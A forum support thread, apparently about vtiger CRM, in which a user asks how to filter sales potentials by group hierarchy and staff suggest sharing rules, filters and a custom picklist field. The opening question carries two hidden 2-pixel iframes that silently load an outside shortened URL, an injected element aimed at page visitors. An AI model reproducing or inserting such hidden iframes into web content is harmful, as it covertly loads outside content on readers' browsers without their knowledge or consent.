Hierachical view of potentials

How do I se things up so that people who are in the "Car Sales" group only see Potentials relating to Car Sales, people who are in the "Truck Sales" group only see potentials relating to "Truck Sales", but that someone who is in "Sales" (overall group) can see all of those?

Basically, I can't find a way to annotate potentials to indicate which segment of businss they belong to. How should I do that? <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

Comments

• 14 Comments sorted by Votes Date Added
  • hi greenasjade,

you can do it by making the potential module as private in

settings > sharing access

after making any changes here please recalculate the sharing access with the help of recalculate button.

according to your need the car sales' group role and truck sales' group role must be at the same level below sales man role.

so sales man can see all the potential but carsales and truck sales can see only potential assign to them.

please apply the above and let us know your feedback.
  • thanks - this is an excellent answer to the question, good to know how to do that.

i asked the wrong question though, i think.

what i need to be able to do (in addition to the above) is have the sales man able to say "show me the carsales potentials".

i can't find anyway of specifying/determining what "kind" of potential a potential is, particularly in a hierarchical way.

for example, the ceo needs to be able to say "i want to see the vehicle sales potentials. now i want to see the aicract sales potentials". the vehicle sales manager needs to be able to say "i want to see the car sales potentials. now show me the truck sales" ... etc.

thanks!
  • hi greenasjade,

i could not figure out much with your last post,so far what i could understand

in list view of potential you want to see records assign to a particular group,for e.g only those records should show which are assign to car sales or which are assigned to truck sales like that.

if the above is your requirement you can do this by creating a new filter and using the advance filter with assign to field

assign to equals car sales

so the created filter will show only those records assign to car sales,like wise you can create different filter for different group and users.

i hope this is the requirement,but as i mention that i am not sure about the requirement please explain a bit more and please give the screen shot which will be easy for us to understand the problem.
  • i think you understand my requirement, but your solution doesn't work for me.

my potentials are all assigned to individuals. these individuals belong to different groups, of course. but this doesn't help to identify which potentials are being handled by (belong to) which groups.

so for example, bob is a car salesman. he has 3 potentials assigned to him. chris is a car salesman. he has 2 potentials assigned to him. fred is a truck salesman, he has 3 potentials assigned to him.

how can jim, their manager, the vehicle sales manager, look at the list of car sales potentials?

thanks!!!
  • hi greenasjade,

there is only one way in which you can achieve this ,you have to change the assign to filed to the group instead of user

for e.g if potential is assign to bob who is a member of carsales man ,you can change the assign to field to car sales man.same for the potentials assign to any other user for this group,here you can use the mass edit function to change the assign to field for more than one record at a single time.

or else you have to note down the users related to group and can use then in your advance filter.

for e.g bob and chris are in the car sales man group ,so create a filter with advance filter option like the following

assign to equals bob,chris

here i have given only bob and chris with comma,if you have any other user in the group you can give their name separated by comma.
  • thanks for your analysis.

this seems like an unfortunate limitation.

clearly, we need to assign potentials to individuals, in order to specify who is accountable for acting on this potential.

we also have to specify the groups in order to implement permissions etc.

however, it seems now we have to duplicate the definition of the group: not only do i have to put chris and bob into the carsales group, but every person who wants to know what carsales potentials exist has to create a filter that duplicates this information.

hmmm....
  • hi greenasjade,

you have one more solution of creating custom field of type picklist where you can give the group name as values of pick list

the field name can be group and you will have the values like carsales,truck sales etc.

so while users will create any record the assign to field will be with their user name ,and they have to give specific group in the group pick list to which they belong to.

for e.g bob will go to create potential he has to select his group(carsales) from the group pick list,same apply for chris.

now in the crm in potential list view you can manage the group records by using the group field in advance filter .

you can also set the default group name in group pick list for every role using the pick list editor,means while creating potential that particular group name will come in the group list by default.for pick list documentation please go to the following link

<!-- m --><a class="postlink" href="http://wiki.vtiger.com/index.php/vtiger510:module_picklist_editor">http://wiki.vtiger.com/index.php/vtiger ... ist_editor</a><!-- m -->

please let us know if you have query regarding this.
  • i like the sound of this - will look into it. it will be most helpful as long as the picklist is automatically populated with the group names - are you saying this is feasible, or do we have to "replicate" the list of groups manually to populate the picklist?
  • hi greenasjade,

you have to create a custom field there where you have to give all the group name manually.
  • thanks for your quick replies. it is unfortunate that there wil be this administrative overhead with error-prone duplication. i can't see any other way, either....